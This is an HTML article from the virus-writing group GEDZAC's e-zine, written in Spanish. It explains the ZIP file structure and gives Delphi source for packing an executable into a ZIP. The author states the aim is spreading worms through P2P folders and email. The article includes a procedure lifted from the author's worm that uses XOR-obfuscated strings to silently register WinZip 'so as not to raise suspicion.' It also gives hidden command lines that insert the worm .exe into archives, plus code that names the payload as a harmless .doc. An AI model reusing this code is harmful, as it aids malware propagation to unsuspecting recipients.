
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"><style type="text/css">
<!--
body,td,th {
	color: #FFFFFF;
}
body {
	background-color: #000000;
	SCROLLBAR-FACE-COLOR: #000000; 
	SCROLLBAR-HIGHLIGHT-COLOR: #0080c0; 
	SCROLLBAR-SHADOW-COLOR: #0080c0; 
	SCROLLBAR-3DLIGHT-COLOR: #000000; 
	SCROLLBAR-ARROW-COLOR: #c0c0c0; 
	SCROLLBAR-TRACK-COLOR: #000000; 
	SCROLLBAR-DARKSHADOW-COLOR: #000000

}
.style55 {font-family: "Courier New", Courier, monospace; font-size: 12px; }
.style68 {color: #FF0000}
.Estilo4 {font-size: 14px; color: #FFFFFF; }
.Estilo5 {font-size: 18px; color: #FFFFFF; font-weight: bold; }
.Estilo6 {font-size: 14px; color: #00FF00; font-weight: bold; }
.Estilo8 {color: #0066FF}
.style76 {font-family: "Courier New", Courier, monospace; font-size: 12px; color: #00CCFF; }
.style78 {font-family: "Courier New", Courier, monospace; font-size: 12px; color: #999999; }
.Estilo16 {font-size: 14px; color: #FFFFFF; font-weight: bold; }
.style80 {
	font-family: "Courier New", Courier, monospace;
	font-size: 12px;
	color: #CCCCCC;
}
.style81 {font-size: 14px; color: #0066CC; font-weight: bold; font-family: "Courier New", Courier, monospace;}
.style82 {color: #FFFF00}
-->

</style>
</head>

<body>

  <div align="left">
    <p><span class="style55"><img src="../0x01.png" width="585" height="107"><bR>
      <span class="style81">#Comprimiendo en Delphi</span><br>
    #Autor: <strong>Pana_Infierno [GEDZAC]</strong> <em>&lt;pana_infierno[at]gedzac[dot]com&gt;</em></span><br>
    <span class="style80">#Incluye codigos fuente</span></p>
</div>
<div align="left">
  <p align="justify" class="style55">Mi idea y necesidad surgió después de usar el winrar o el winzip para comprimir mis archivos con los que infecto las carpetas p2p o envió por correo, supongo que en un 90% de los computadores existe una versión de al menos winzip o winrar pero si piensas que para que voy a analizar el formato binario de los archivos zip, si lo puedo hacer  con la línea de comando de estos programas… arriba en la esquina superior derecha hay una X presiónala y cierra este articulo porque veo que no te interesa aprender. La motivación es aprender la estructura interna del archivo zip para poder crearlo de forma binaria en delphi y no depender de ningún programa de compresión para crearlo.<br>
    Primero expondré el método en delphi que usaba para comprimir un archivo en formato zip bueno es un poco básico pero funciona bien J.<br>
    Primero creare un archivo zip con este procedimiento:</p>
  <p class="style55"><span class="style78">procedure NewZip(ruta:string);<br>
    const<br>
    zip  : ARRAY [1..100] OF Byte = ($50, $4B, $03, $04, $0A, $00, $00, $00, $00, $00, $F8, $71, $50, $33, $00, $00,$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $01, $00, $00, $00, $5F, $50,$4B, $01, $02, $14, $00, $0A, $00, $00, $00, $00, $00, $F8, $71, $50, $33, $00,$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $01, $00, $00, $00, $00,$00, $00, $00, $01, $00, $20, $00, $B6, $81, $00, $00, $00, $00, $5F, $50, $4B,$05, $06, $00, $00, $00, $00, $01, $00, $01, $00, $2F, $00, $00, $00, $1F, $00,$00, $00, $00, $00);<br>
    var Archivo:file;<br>
    X:integer;<br>
    begin<br>
    FileMode:=2;<br>
    {$I-}<br>
    AssignFile(Archivo,ruta);<br>
    rewrite(Archivo,1);<br>
    CloseFile(Archivo);<br>
    {$I+}<br>
    X := IOResult;<br>
    FileMode:=2;<br>
    if X &lt;&gt; 0 then exit;<br>
    reset(Archivo,1);<br>
    BlockWrite(Archivo,zip,100);<br>
    closefile(Archivo);<br>
    end;</span><br>
  </p>
  <p align="justify" class="style55">Este procedimiento contiene el mínimo archivo zip que puedo crear pesa 100 bytes contiene un archivo que no es nada solo que no se puede crear un zip sin archivo J.<br>
    Una vez creado procedo a agregarle mi archivo usando la línea de comando ya sea con winzip o winrar, en caso de ser winzip tengo que registrarlo para no levantar sospechas.<br>
  </p>
  <p class="style78">Procedure registrarWinZip;<br>
    begin<br>
    //Registrando WinZip<br>
    AssignFile(SuperTaldo,PathWindows+e('V]cdPcz$xom',10));<br>
    Rewrite(SuperTaldo);<br>
    Writeln(SuperTaldo,e('XOMONC^&gt;',10));        Writeln(SuperTaldo,e('QBAOSUI_XXOD^U_YOXVYel~}kxoVDcie*Gka*Iegz~cdmV]cdPczV]cdCdcW',10));<br>
    Writeln(SuperTaldo,e('(DKGO(7(MONPKI(',10));<br>
    Writeln(SuperTaldo,e('(YD(7(OHH3:&gt;8O(',10));        Writeln(SuperTaldo,e('QBAOSU_YOXYV$NOLK_F^Vyel~}kxoVdcie*gka*iegz~cdmV}cdpczV}cdcdcVDkgoW',10));<br>
    Writeln(SuperTaldo,e('(DKGO(7(MONPKI(',10));<br>
    Writeln(SuperTaldo,e('(YD(7(OHH3:&gt;8O(',10));<br>
    CloseFile(SuperTaldo);<br>
    if GetOSVersion=1 then<br>
    begin<br>
    Accion:=e('Ieggkdn$ieg*%i*xomonc~*%y*%i*',10)+ PathWindows+e('V]cdPcz$xom',10);<br>
    end<br>
    else<br>
    begin<br>
    Accion:=e('Ign$oro*%i*xomonc~*%y*%i*',10)+ PathWindows+e('V]cdPcz$xom',10);<br>
    end;<br>
    Try<br>
    WinExec(Pchar(accion),SW_HIDE);<br>
    Except<br>
    end;</p>
  <p align="justify" class="style55">Con este procedimiento registro winzip, para desencriptar los textos les recomiendo que usen la herramienta Easy_XOR_Encrypted que se encuentra en nuestra sección de utilidades en http://www.gedzac.com porque este es un procedimiento que esta incluido en uno de mis worms, bueno ya registrado el winzip puedo usarlo mediante la línea de comando para agregar un archivo dentro del zip que he creado.<br>
    Expondré el procedimiento que he creado para infectar los archivo zip ya sea con winrar o winzip.<br>
    La línea de comando la pueden encontrar en la Mitosis 2</p>
  <p align="justify" class="style55">Acá están los extractos del código que es usado por mi para incluir mi archivo dentro del zip</p>
  <p class="style55">Para winrar:<br>
    <span class="style76">accion:='Cmd.exe /c C:\ARCHIV~1\WinRAR\winrar.exe a '+ extractshortpathname(pathwindows+'\'+strin+'.zip') +' '+ extractshortpathname('C:\'+strin+'.exe') ;<br>
    WinExec(Pchar(accion),SW_HIDE);</span></p>
  <p> </p>
  <p class="style55">Para winzip:<br>
    <span class="style76">accion:='Cmd.exe /c C:\ARCHIV~1\WinZip\winzip32.exe -a '+ extractshortpathname(pathwindows+'\'+strin+'.zip') +' '+ extractshortpathname('C:\'+strin+'.exe') ;<br>
    WinExec(Pchar(accion),SW_HIDE);</span></p>
  <p align="justify" class="style55">Enseguida esta el nuevo método para comprimir archivos en formato zip, en realidad no se comprime el archivo solo se le agrega la estructura para que sea reconocido como un archivo zip eso significa que nuestro archivo pesara lo mismo mas 100 bytes, este archivo será reconocido por cualquier compresor que pueda abrir zip’s.</p>
  <p align="justify"> </p>
  <p align="justify" class="style55">Primera parte:<br>
    Un archivo zip consta de 4 partes principales usare los nombres gringos porque así lo encontré el documento pero en el code colocare todo en español.</p>
  <p> </p>
  <p class="style55">1.Local file header                  (lo usaremos)<br>
    2.File data                          (lo usaremos)<br>
    3.Data_descriptor                    (no)<br>
    4.[Central directory] end of central directory record</p>
  <p> </p>
  <p align="justify" class="style55">Descripción binaria de cada una de las partes del zip<br>
    Los bytes entre paréntesis son fijos dentro del zip, nosotros como necesitamos crear<br>
    un zip que no cambiara en su totalidad dejaremos otros bytes fijos para crear nuestro<br>
    archivo.</p>
  <p> <span class="style55"><br>
    A un lado llevara un *  con los bites que serán predeterminados.<br>
    <span class="style82">1.  Local file header:</span><br>
    <br>
    local file header signature-----------4 bytes                           * 50 4b 03 04  bytes fijos<br>
    version needed to extract-------------2 bytes                           * 0a 00<br>
    general purpose bit flag--------------2 bytes                           * 00 00<br>
    compression method--------------------2 bytes                           * 00 00<br>
    last mod file time--------------------2 bytes <br>
    last mod file date--------------------2 bytes <br>
    crc-32--------------------------------4 bytes <br>
    compressed size-----------------------4 bytes <br>
    uncompressed size---------------------4 bytes <br>
    filename length-----------------------2 bytes <br>
    extra field length--------------------2 bytes                           * 00 00 <br>
    filename (variable size) <br>
    extra field (variable size)  (no lo usaremos) </span></p>
  <p> </p>
  <p class="style55"> <span class="style82">2.  File data</span> <br>
    este será un valor que variara segun el <br>
    peso del archivo que comprimiremos </p>
  <p> </p>
  <p class="style55"> <span class="style82">3.  Data descriptor:</span><br>
    crc-32                               4 bytes<br>
    compressed size                      4 bytes<br>
    uncompressed size                    4 bytes</p>
  <p> </p>
  <p class="style55">Esta flecha indica que según el estado de esos bytes será si usaremos o no el Data descriptor, nosotros dejaremos automáticamente este valor en un numero</p>
  <p class="style55"> (00 00) que indicara que no usaremos el data descriptor. Ahora continuemos con el proyecto.</p>
  <p class="style55"> <span class="style82">4.  Central directory structure:</span><br>
    <br>
    [file header] . . .  end of central dir record<br>
    <br>
    File header:<br>
    <br>
    central file header signatura------4 bytes                  * 50 4b 01 02<br>
    version made by--------------------2 bytes                  * 14 00<br>
    version needed to extract----------2 bytes                  * 0a 00<br>
    general purpose bit flan-----------2 bytes                  * 00 00<br>
    compression method-----------------2 bytes                  * 00 00<br>
    last mod file time-----------------2 bytes<br>
    last mod file date-----------------2 bytes<br>
    crc-32-----------------------------4 bytes<br>
    compressed size--------------------4 bytes<br>
    uncompressed size------------------4 bytes<br>
    filename length--------------------2 bytes<br>
    extra field length-----------------2 bytes<br>
    file comment length----------------2 bytes                  * 00 00<br>
    disk number start------------------2 bytes                  * 00 00<br>
    internal file attributes-----------2 bytes<br>
    external file attributes-----------4 bytes<br>
    relative offset of local header----4 bytes                  * 00 00 00 00<br>
    filename (tamaño variable)<br>
    extra field (tamaño variable) (no lo usaremos)<br>
    file comment (tamaño variable) (no lo usaremos) <br>
    -End of central dir record: <br>
    end of central dir signature-------4 bytes                  * 50 4b 05 06  bytes fijos<br>
    number of this disk----------------2 bytes                  * 00 00<br>
    number of the disk with the<br>
    start of the central directory-----2 bytes                  * 00 00<br>
    total number of entries in<br>
    the central dir on this disk-------2 bytes                  * 01 00<br>
    total number of entries in<br>
    the central dir--------------------2 bytes                  * 01 00<br>
    size of the central directory------4 bytes<br>
    offset of start of central<br>
    directory with respect to<br>
    the starting disk number---------- 4 bytes<br>
    zipfile comment length-------------2 bytes                  * 00 00<br>
    zipfile comment (variable size)    (no lo usaremos)<br>
  </p>
  <p class="style55">ahora que conocemos la estructura interna del zip les mostrare el zip mas chico que se pueda crear</p>
  <p> </p>
  <p class="style55"><span class="style78">50 4B 03 04 0A 00 00 00 00 00 5B B5 54 33 D2 A3<br>
    08 78 01 00 00 00 01 00 00 00 01 00 00 00 4E 6E<br>
    50 4B 01 02 14 00 0A 00 00 00 00 00 5B B5 54 33<br>
    D2 A3 08 78 01 00 00 00 01 00 00 00 01 00 00 00<br>
    00 00 00 00 01 00 20 00 B6 81 00 00 00 00 4E 50<br>
    4B 05 06 00 00 00 00 01 00 01 00 2F 00 00 00 20<br>
    00 00 00 00 00</span><br>
  </p>
  <p class="style55">98 bytes mínimos + los datos variables en este caso con el nombre sube a 101 bytes.<br>
  </p>
  <p class="style55">Aca va el codigo…</p>
  <p class="style78">//******************************** copiar desde aca ***************************************</p>
  <p class="style78">program zipPana;</p>
  <p class="style78">uses windows;</p>
  <p class="style78">//***********************************************************************************<br>
    //*************** Programa desarrollado y analizado por Pana_Infierno ***************<br>
    //************************** para Mitosis 4 *****************************************<br>
    //***********************************************************************************</p>
  <p class="style78">const</p>
  <p class="style78"> V_Cabeza  : array [1..10] of byte = ($50,$4B,$03,$04,$0A,$00,$00,$00,$00,$00);<br>
    V_Cuerpo  : array [1..12] of byte = ($50,$4B,$01,$02,$14,$00,$0A,$00,$00,$00,$00,$00);<br>
    V_Pies    : array [1..12] of byte = ($50,$4B,$05,$06,$00,$00,$00,$00,$01,$00,$01,$00);<br>
    qUEpaSO   : array [1..4]  of byte = ($00,$00,$00,$00);</p>
  <p> </p>
  <p class="style78">var<br>
    CRC32Table : ARRAY[0..255] OF Cardinal;</p>
  <p class="style78">TYPE</p>
  <p class="style78"> CABEZA_ = record<br>
    Hora:word;// 2 bytes;<br>
    Fecha:word;// 2 bytes<br>
    Crc32:Cardinal;// 4 bytes<br>
    tamanocomprimido:cardinal;// 4 bytes<br>
    tamanodescomprimido:cardinal;// 4 bytes<br>
    LargonombreArchivo:word;// 2 bytes<br>
    largoRegistroExtra:Word;// 2 bytes * 00 00</p>
  <p class="style78"> END;</p>
  <p class="style78"> dword = LongWord;<br>
    bool  = LongBool;</p>
  <p> </p>
  <p class="style78"> CUERPO_ = RECORD<br>
    Hora:word;// 2 bytes;<br>
    Fecha:word;// 2 bytes<br>
    Crc32:cardinal;// 4 bytes<br>
    tamanocomprimido:cardinal;// 4 bytes<br>
    tamanodescomprimido:Cardinal;// 4 bytes<br>
    LargonombreArchivo:word;// 2 bytes<br>
    largoExtraArchivo:word;<br>
    largoComentarioArchivo:word;<br>
    numeroInicioDisco:word;<br>
    comentarioArchivo:word;<br>
    ExtAttribLo:word;<br>
    ExtAttribHi:word;<br>
    END;</p>
  <p class="style78"> PIES_ = RECORD<br>
    tamanoCentralDirectorio:cardinal;// 4 bytes<br>
    numeroInicioDisco:cardinal;// 4 bytes<br>
    comentarioArchivoZip:word;// 2 Bytes<br>
    END;</p>
  <p> </p>
  <p> </p>
  <p class="style78">PROCEDURE BuildCRC32Table; ASSEMBLER;</p>
  <p class="style78">ASM<br>
    mov        ebx, 0EDB88320h<br>
    lea edi, crc32table<br>
    xor ecx, ecx</p>
  <p class="style78"> @loc1:<br>
    mov        eax, ecx<br>
    mov        edx, 8</p>
  <p class="style78"> @loc2:<br>
    test eax, 1<br>
    jz  @loc3<br>
    shr eax, 1<br>
    xor eax, ebx<br>
    jmp         @loc4</p>
  <p class="style78"> @loc3:<br>
    shr eax, 1</p>
  <p class="style78"> @loc4:<br>
    dec         edx<br>
    jnz @loc2<br>
    stosd<br>
    inc ecx<br>
    cmp        ecx, 256<br>
    jb  @loc1</p>
  <p class="style78">END;</p>
  <p> </p>
  <p class="style78">FUNCTION CalculateCRC32(Buffer:Pointer;Size:Cardinal) : Cardinal; ASSEMBLER;</p>
  <p class="style78">ASM</p>
  <p class="style78"> push esi<br>
    push edi<br>
    push ebx<br>
    mov edi,edx<br>
    mov esi,eax<br>
    xor ebx,ebx<br>
    mov eax,$ffffffff<br>
    mov ecx,edi<br>
    shr ecx,2<br>
    jecxz @Rest<br>
    @Loop:<br>
    mov edx,[esi]<br>
    mov bl,al<br>
    xor bl,dl<br>
    shr eax,8<br>
    xor eax,dword ptr [CRC32table+ebx*4]<br>
    mov bl,al<br>
    xor bl,dh<br>
    shr eax,8<br>
    xor eax,dword ptr [CRC32table+ebx*4]<br>
    shr edx,16<br>
    mov bl,al<br>
    xor bl,dl<br>
    shr eax,8<br>
    xor eax,dword ptr [CRC32table+ebx*4]<br>
    mov bl,al<br>
    xor bl,dh<br>
    shr eax,8<br>
    xor eax,dword ptr [CRC32table+ebx*4]<br>
    add esi,4<br>
    loop @Loop<br>
    @Rest:<br>
    mov ecx,edi<br>
    and ecx,3<br>
    jecxz @End<br>
    @Loop_Rest:<br>
    mov bl,al<br>
    xor bl,[esi]<br>
    shr eax,8<br>
    inc esi<br>
    xor eax,dword ptr [CRC32table+ebx*4]<br>
    loop @Loop_Rest</p>
  <p class="style78">@End:<br>
    xor eax,$ffffffff<br>
    pop ebx<br>
    pop edi<br>
    pop esi<br>
    END;</p>
  <p> </p>
  <p class="style78">FUNCTION ComputeFileCRC32(FileName:STRING) : Longint;<br>
    VAR<br>
    InputFile    : FILE;<br>
    FileSize_    : Integer;<br>
    Buffer       : AnsiString;</p>
  <p class="style78">BEGIN</p>
  <p class="style78"> BuildCRC32Table;<br>
    Assign(InputFile,FileName);<br>
    FileMode:=0;<br>
    Reset(InputFile,1);<br>
    FileSize_:=FileSize(InputFile);<br>
    SetLength(Buffer,FileSize_);<br>
    BlockRead(InputFile,Buffer[1],FileSize_);<br>
    Result:=CalculateCRC32(@Buffer[1],FileSize_);<br>
    Close(InputFile);</p>
  <p class="style78">END;</p>
  <p class="style78">//***********************************************************<br>
    //******************* FIN FUNCIONES CRC *********************<br>
    //***********************************************************<br>
  </p>
  <p class="style78">procedure crearZip(NombreArchivoFuera,nombreArchivoDentro,NombreZipFuera:string);<br>
    var<br>
    CABEZA:CABEZA_;<br>
    CUERPO:CUERPO_;<br>
    PIES:PIES_;<br>
    hora:_FileTime;<br>
    horaA:Word;<br>
    fechaA:Word;<br>
    largoDentro:integer;<br>
    buf:AnsiString;<br>
    dentro:file;<br>
    fuera:file;<br>
    large:integer;</p>
  <p class="style78">begin<br>
    large:=Length(nombreArchivoDentro);<br>
    GetSystemTimeAsFileTime(hora);<br>
    FileTimeToDosDateTime(hora,fechaA,horaA);<br>
    AssignFile(dentro,NombreArchivoFuera);<br>
    Reset(dentro,1);<br>
    largoDentro:=FileSize(dentro);<br>
    SetLength(buf,largoDentro+2000);<br>
    BlockRead(dentro,buf[1],largoDentro);<br>
    CloseFile(dentro);<br>
    AssignFile(fuera,NombreZipFuera);</p>
  <p class="style78"> Rewrite(fuera,1);<br>
    cabeza.Hora:=horaA;<br>
    cabeza.Fecha:=fechaA;<br>
    cabeza.Crc32:=ComputeFileCRC32(nombreArchivoFuera);<br>
    cabeza.tamanocomprimido:=largoDentro;<br>
    cabeza.tamanodescomprimido:=largoDentro;<br>
    cabeza.LargonombreArchivo:=large;<br>
    cabeza.largoRegistroExtra:=0;<br>
    cuerpo.Hora :=horaA;<br>
    cuerpo.fecha:=fechaA;<br>
    cuerpo.Crc32 :=cabeza.Crc32;<br>
    cuerpo.tamanocomprimido:=largoDentro;<br>
    cuerpo.tamanodescomprimido:=largoDentro;<br>
    cuerpo.LargonombreArchivo:=Large;<br>
    cuerpo.largoExtraArchivo  :=0;<br>
    cuerpo.largoComentarioArchivo  :=0;<br>
    cuerpo.numeroInicioDisco  :=0;<br>
    cuerpo.comentarioArchivo :=0;<br>
    cuerpo.ExtAttribLo :=$0020;<br>
    cuerpo.ExtAttribHi :=$0;<br>
    pies.tamanoCentralDirectorio:=46+Length(nombreArchivoDentro);<br>
    pies.numeroInicioDisco :=30+length(nombreArchivoDentro)+largoDentro;<br>
    pies.comentarioArchivoZip  :=0;<br>
    BlockWrite(fuera,v_cabeza,SizeOf(v_cabeza));<br>
    BlockWrite(fuera,cabeza,SizeOf(cabeza));<br>
    BlockWrite(fuera,nombreArchivoDentro[1],Length(nombreArchivoDentro));<br>
    BlockWrite(fuera,Buf[1],largoDentro);<br>
    BlockWrite(fuera,V_Cuerpo,SizeOf(V_Cuerpo));<br>
    BlockWrite(fuera,cuerpo,SizeOf(cuerpo)-2);<br>
    BlockWrite(fuera,qUEpaSO,SizeOf(qUEpaSO));<br>
    BlockWrite(fuera,nombreArchivoDentro[1],Length(nombreArchivoDentro));<br>
    BlockWrite(fuera,V_Pies,SizeOf(V_Pies));<br>
    BlockWrite(fuera,pies,SizeOf(pies)-2);<br>
    Close(fuera);<br>
    end;</p>
  <p class="style78">Begin<br>
    crearZip('c:\miarchivo.exe','este es el nombre del Archivo dentro.doc','c:\nuevo_zip.zip');<br>
    end.</p>
  <p class="style78">//**************************************** Hasta Aca *****************************************</p>
  <p><span class="style55">Bueno Amigos espero que el código les sirva, doy libertad para hacer con el lo que quieran con el, esto esta desarrollado con el fin que cada uno le de…<br>
    Un saludos a mis compañeros de GEDZAC LABS</span><br>
  </p>
  <p align="justify" class="style55">&nbsp;</p>
</div>
<div align="left" class="style55">
      <p>&nbsp;</p>
    </div>
    </body>
</html>
